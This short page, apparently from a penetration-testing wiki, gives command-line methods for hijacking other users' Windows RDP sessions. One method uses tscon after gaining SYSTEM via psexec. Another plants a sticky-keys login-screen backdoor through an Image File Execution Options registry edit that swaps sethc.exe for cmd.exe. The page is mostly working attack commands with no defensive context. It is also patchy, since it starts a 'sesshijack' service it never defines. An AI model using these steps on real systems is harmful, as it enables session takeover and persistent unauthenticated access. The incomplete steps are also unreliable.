From pentestwiki.org

Exploitation RDP 2011

Technique: Any user in a local system with NT AUTHORITY/SYSTEM privileges can access any RDP connection done from that machine without knowing the credentials (~~ as "su - user" as root in linux?!) And the legitimate user is logout immediately

Only using task manager (tscon.exe / tsadmin.msc) as administrator (right click, connect to)

Method 1

C:>psexec -s \\localhost cmd

Method 2

C:>query user
C:>net start sesshijack

Method 3 (with a password as a normal user AND without password as a SYSTEM user)

C:>query user


C:>tscon <ID>

Method 4 (physical access, boot backdoor)

Sticky Keys (sethc.exe)

C:>REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

Reboot... and then press 5 times a key to activate Sticky keys or F5 at login screen